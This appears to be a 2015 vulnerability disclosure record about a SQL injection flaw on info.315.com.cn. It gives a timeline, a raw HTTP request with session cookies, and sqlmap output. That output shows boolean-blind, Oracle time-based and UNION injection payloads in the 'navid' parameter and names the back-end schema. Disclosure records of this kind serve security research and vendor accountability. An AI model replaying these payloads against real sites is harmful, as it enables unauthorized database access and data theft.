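2015-11-11: Details reported to the vendor; awaiting vendor response.
2015-11-24: The vendor actively ignored the vulnerability; details disclosed to the public.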
POST /sltindexlist HTTP/1.1
Content-Length: 199
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://info.315.com.cn:80/
Cookie: JSESSIONID=KLnwWCgS71CzpnPSrcKYqGWvJnYpXhcBR43BKvzh93LKBsBxJJg1!-1246551652; safedog-flow-item=361BDCAB1A0F818D19E4E553A3D75F76; 53gid0=84155521315; 53gid1=84155521315; 53gid2=84155521315; visitor_type=new; 53uvid=1; 53kf_72106741_keyword=http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); kf_72106741_keyword_ok=1; onliner_zdfq72106741=0; WT_FPC=id=2c999390baf9e943b4d1447223336720:lv=1447223336720:ss=1447223336720; guest_id=84155521315; customer_service_language=cn; unique_ip_72106741=111.202.249.47; unique_ip_revisit72106741=1447223374; SESSION_COOKIE=www15_1; CNZZDATA1831326=cnzz_eid%3D503006059-1447223259-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447223259
Host: info.315.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

classid=005014006001001&endtime=%bd%e1%ca%f8%ca%b1%bc%e4&navid=69*&startime=%bf%aa%ca%bc%ca%b1%bc%e4&submit1=%b2%e9%d1%af&title=%c7%eb%ca%e4%c8%eb%b9%d8%bc%fc%d7%d6
Parameter: navid
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: classid=005014006001001&endtime=%bd%e1%ca%f8%ca%b1%bc%e4&navid=69 AND 3171=3171&startime=%bf%aa%ca%bc%ca%b1%bc%e4&submit1=%b2%e9%d1%af&title=%c7%eb%ca%e4%c8%eb%b9%d8%bc%fc%d7%d6

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: classid=005014006001001&endtime=%bd%e1%ca%f8%ca%b1%bc%e4&navid=69 AND 4515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(100)||CHR(99)||CHR(122),5)&startime=%bf%aa%ca%bc%ca%b1%bc%e4&submit1=%b2%e9%d1%af&title=%c7%eb%ca%e4%c8%eb%b9%d8%bc%fc%d7%d6

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: classid=005014006001001&endtime=%bd%e1%ca%f8%ca%b1%bc%e4&navid=-6665 UNION ALL SELECT NULL,CHR(113)||CHR(98)||CHR(98)||CHR(120)||CHR(113)||CHR(80)||CHR(69)||CHR(110)||CHR(76)||CHR(71)||CHR(106)||CHR(68)||CHR(78)||CHR(107)||CHR(68)||CHR(113)||CHR(98)||CHR(112)||CHR(122)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- &startime=%bf%aa%ca%bc%ca%b1%bc%e4&submit1=%b2%e9%d1%af&title=%c7%eb%ca%e4%c8%eb%b9%d8%bc%fc%d7%d6
---
web application technology: Servlet 2.4, JSP 2.0
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'DB315WEB'
Parameter filtering
Severity: No impact (ignored by vendor)
Ignored at: 2015-11-24 14:18
Vulnerability Rank: 4 (WooYun rating)
None yet